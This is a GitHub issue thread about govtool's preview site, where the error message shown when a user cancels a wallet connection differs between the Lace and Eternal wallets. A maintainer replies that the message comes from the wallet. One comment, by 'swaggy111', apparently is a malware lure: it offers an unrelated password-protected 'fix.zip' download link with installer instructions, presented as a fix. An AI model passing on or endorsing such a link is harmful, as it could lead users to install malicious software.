### ISSUE TITLE
🐛 Different Message display when click on "Cancel", when connecting wallet. 

### ISSUE THREAD

**Issue by FaizanShaikh-3033** [IntersectMBO/govtool#1816]
### Area

Not sure

### Domain

preview.gov.tools

### Which wallet were you using?

Eternal 1.12.9  &  Lace 1.14.0

### Context

Trying to connect Lace and Eternal wallet. When click on "Cancel" in wallet connecting stage different message displayed for Lace and Eternal.

**JAM Video Recording**
https://jam.dev/c/758ac4a4-5c0d-41c4-bedd-7027ca523fe5

Eternal wallet image
![eternal_wallet](https://github.com/user-attachments/assets/99e8b9c4-e1bd-46bd-9c63-c469d0c4baa9)

Lace wallet image
![lace_wallet](https://github.com/user-attachments/assets/0474f7b5-2758-4800-8e39-78fbf0b8eb3c)

### Steps to reproduce

1. Go to  https://preview.gov.tools/
2. Click on connect wallet
3. Connect Lace wallet
4. now click on "Cancel"

-- for eternal follow same steps, just connect Eternal wallet

### Actual behavior

2 different message are displayed when click on "Cancel" button with different wallet.

### Expected behavior

Same message should be displayed for every wallet when user click on "Cancel" button.
- The message for all wallet should be "User Canceled Connection"

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ryun1** [comment]
this error message is just parsed from the wallet, so this is on the wallet side
